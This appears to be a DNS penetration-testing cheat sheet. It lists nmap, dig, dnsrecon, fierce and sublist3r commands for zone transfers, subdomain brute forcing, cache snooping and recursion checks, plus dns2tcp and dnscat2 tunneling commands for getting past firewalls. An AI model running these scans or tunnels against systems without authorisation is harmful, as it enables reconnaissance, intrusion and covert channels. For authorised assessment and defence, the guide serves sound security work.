DNS penetration testing guide covering zone transfer testing, subdomain enumeration, DNS cache snooping, and DNS amplification attacks using tools like Dig, DNSRecon, Fierce, and Sublist3r for security assessments and ethical hacking.
DNS (Domain Name System) runs on port 53 and translates domain names to IP addresses. DNS servers often contain misconfigurations that can reveal internal network structure, hostnames, and sensitive information through zone transfers, subdomain enumeration, and information disclosure.
Nmap service scan:
nmap -sV -sU -p 53 $RHOST
nmap -sC -sV -sU -p 53 $RHOST
DNS version detection:
nmap --script dns-nsid -p 53 -sU $RHOST
nmap --script dns-service-discovery -p 53 -sU $RHOST
Default safe scripts:
nmap --script "dns-* and safe" -p 53 -sU $RHOST
All DNS scripts:
nmap --script dns-* -p 53 -sU $RHOST
Common enumeration scripts:
nmap --script dns-brute,dns-cache-snoop,dns-recursion -p 53 -sU $RHOST
Vulnerability detection:
nmap --script dns-zone-transfer -p 53 -sU $RHOST
Dig:
dig @$RHOST $DOMAIN A
dig @$RHOST $DOMAIN MX
dig @$RHOST $DOMAIN NS
dig @$RHOST $DOMAIN TXT
dig @$RHOST $DOMAIN SOA
dig @$RHOST $DOMAIN ANY
dig @$RHOST $DOMAIN ANY +noall +answer
Nslookup:
nslookup $DOMAIN $RHOST
nslookup -type=MX $DOMAIN $RHOST
nslookup -type=NS $DOMAIN $RHOST
Host:
host $DOMAIN $RHOST
host $DOMAIN $RHOST -t ANY
-t ANY queries all available record types (A, AAAA, MX, NS, TXT, SOA, SRV, CNAME)
Get nameservers:
dig @$RHOST $DOMAIN NS +short
Comprehensive DNS enumeration tool:
Basic enumeration:
dnsrecon -d $DOMAIN
dnsrecon -d $DOMAIN -t std -n $RHOST
-t std standard scan type-n targets specified DNS server to queryEnumerate subdomains to discover additional attack surface and internal services.
DNSRecon:
dnsrecon -d $DOMAIN -D /usr/share/wordlists/dnsmap.txt -t brt
dnsrecon -d $DOMAIN -D /usr/share/wordlists/subdomains-top1million-5000.txt -t brt
Fierce:
fierce -dns $DOMAIN
fierce -dns $DOMAIN -wordlist /usr/share/wordlists/dnsmap.txt
Gobuster (DNS mode):
gobuster dns -d $DOMAIN -w /usr/share/wordlists/subdomains-top1million-5000.txt
Sublist3r:
sublist3r -d $DOMAIN
sublist3r -d $DOMAIN -n -t 100
Dnsenum:
dnsenum $DOMAIN
dnsenum --threads 50 -f /usr/share/wordlists/dnsmap.txt $DOMAIN
Query various DNS record types to gather information about the target infrastructure.
TXT Records:
dig @$RHOST $DOMAIN TXT
dig @$RHOST _dmarc.$DOMAIN TXT
dig @$RHOST _spf.$DOMAIN TXT
SPF Records:
dig @$RHOST $DOMAIN TXT | grep spf
Common record types:
dig @$RHOST $DOMAIN MX # Mail servers
dig @$RHOST $DOMAIN SRV # Service records
dig @$RHOST $DOMAIN CNAME # Canonical names
dig @$RHOST $DOMAIN AAAA # IPv6 addresses
Discover hostnames from IP ranges:
Single IP:
dig @$RHOST -x 192.168.1.1
host 192.168.1.1 $RHOST
IP range:
for ip in {1..254}; do dig @$RHOST -x 192.168.1.$ip +short; done
Query DNS cache to discover recently queried domains, which can reveal internal services and visited websites.
Manual cache query:
dig @$RHOST nonexistent12345.$DOMAIN +norecurse
If response has NOERROR, the domain is likely cached (queried recently).
Automated cache snooping:
nmap --script dns-cache-snoop --script-args dns-cache-snoop.memcachefile=/usr/share/nmap/nselib/data/dns-srv-names.dat -p 53 -sU $RHOST
Test for common DNS misconfigurations and vulnerabilities before attempting exploitation.
Zone transfers allow DNS servers to replicate DNS data. Test if zone transfers are allowed without proper restrictions.
Manual test with dig:
dig @$RHOST $DOMAIN AXFR
dig @$RHOST -t AXFR $DOMAIN
Test with nslookup:
nslookup
> server $RHOST
> set type=any
> ls -d $DOMAIN
Test with host:
host -T -l $DOMAIN $RHOST
Test against all nameservers:
for ns in $(dig +short NS $DOMAIN); do echo "=== $ns ==="; dig @$ns $DOMAIN AXFR; done
Automated testing:
dnsrecon -d $DOMAIN -a -n $RHOST
fierce -dns $DOMAIN -dnsserver $RHOST
nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=$DOMAIN -p 53 -sU $RHOST
Note: Successful zone transfers reveal internal network structure, subdomains, and hostnames. Always test if zone transfers are allowed, even if they should be restricted.
Test if DNS server allows recursive queries (should be restricted for public DNS):
Test recursion:
dig @$RHOST www.google.com
If server resolves external domains, recursion is enabled.
Note: Public DNS servers should disable recursion to prevent DNS amplification attacks. Internal DNS servers typically allow recursion.
Check if wildcard DNS is configured:
Test random subdomain:
dig @$RHOST random12345nonexistent.$DOMAIN
If resolves to same IP, wildcard DNS is enabled.
Test if DNS server allows rebinding attacks:
Internal IP resolution:
dig @$RHOST internal.$DOMAIN
# Check if resolves to private IP (10.x.x.x, 192.168.x.x, 172.16-31.x.x)
Test DNS cache poisoning vulnerabilities:
Check transaction ID randomness:
# Multiple queries and analyze transaction IDs
for i in {1..100}; do dig @$RHOST $DOMAIN +short; done
If zone transfers are allowed, exploit them to retrieve all DNS records for a domain.
Dig:
dig @$RHOST $DOMAIN AXFR
dig @$RHOST -t AXFR $DOMAIN
Nslookup:
nslookup
> server $RHOST
> set type=any
> ls -d $DOMAIN
Host:
host -T -l $DOMAIN $RHOST
DNSRecon:
dnsrecon -d $DOMAIN -a
dnsrecon -d $DOMAIN -a -n $RHOST
Fierce:
fierce -dns $DOMAIN -dnsserver $RHOST
Nmap:
nmap --script dns-zone-transfer -p 53 -sU $RHOST
nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=$DOMAIN -p 53 -sU $RHOST
Attempt zone transfer against all nameservers:
for ns in $(dig +short NS $DOMAIN); do echo "=== $ns ==="; dig @$ns $DOMAIN AXFR; done
Test if DNS server can be used for amplification attacks (enables recursion, responds to ANY queries).
Test recursion:
dig @$RHOST www.google.com
If server resolves external domains, recursion is enabled.
Test ANY queries:
dig @$RHOST $DOMAIN ANY
DNS tunneling can bypass network restrictions by encapsulating data in DNS queries and responses.
Identify suspicious DNS traffic:
# High query frequency
tcpdump -i eth0 port 53
# Large DNS responses
# Unusual subdomains
# Queries to known DNS tunnel providers
dns2tcp:
# Client
dns2tcp-client -l 8888 -r ssh -z $DOMAIN -d 2
# Server
dns2tcpd -f dns2tcpd.conf
dnscat2:
# Server
dnscat2 --dns domain=$DOMAIN
# Client
dnscat2 $DOMAIN
Note: DNS tunneling is often used by malware and can be detected through traffic analysis. It’s slow but can bypass traditional firewall rules.
Check for DoH:
curl -H "accept: application/dns-json" "https://$RHOST/dns-query?name=$DOMAIN&type=A"
Check for DoT:
nmap -sV -p 853 $RHOST
openssl s_client -connect $RHOST:853
DoH query:
curl "https://cloudflare-dns.com/dns-query?name=$DOMAIN&type=A" -H "accept: application/dns-json"
DoT query:
dig @$RHOST -p 853 +tls $DOMAIN
Most common DNS query tool:
Common options:
dig @$RHOST $DOMAIN +short # Short output
dig @$RHOST $DOMAIN +noall +answer # Clean output
dig @$RHOST $DOMAIN +trace # Trace DNS resolution
dig @$RHOST $DOMAIN +multiline # Readable format
Comprehensive DNS enumeration:
All features:
dnsrecon -d $DOMAIN -a -s -b -y -k -w -z --threads 50
-a zone transfer-s reverse lookup-b brute force SRV records-y brute force PTR records-k check wildcard-w whois lookup-z DNSSEC zone walkDNS enumeration and brute forcing:
Full scan:
dnsenum $DOMAIN
dnsenum --threads 50 -f wordlist.txt $DOMAIN
DNS reconnaissance tool:
Basic:
fierce -dns $DOMAIN
fierce -dns $DOMAIN -wordlist wordlist.txt -threads 10
Subdomain enumeration using multiple sources:
sublist3r -d $DOMAIN
sublist3r -d $DOMAIN -b -t 100 -e google,yahoo,bing,baidu,ask
-b Enables brute-force mode-t Sets the number of threads for concurrent operations-e Which search engines to query for subdomain discoveryHigh-performance DNS stub resolver:
# Generate queries
cat subdomains.txt | massdns -r /usr/share/massdns/lists/resolvers.txt -t A -o S -w results.txt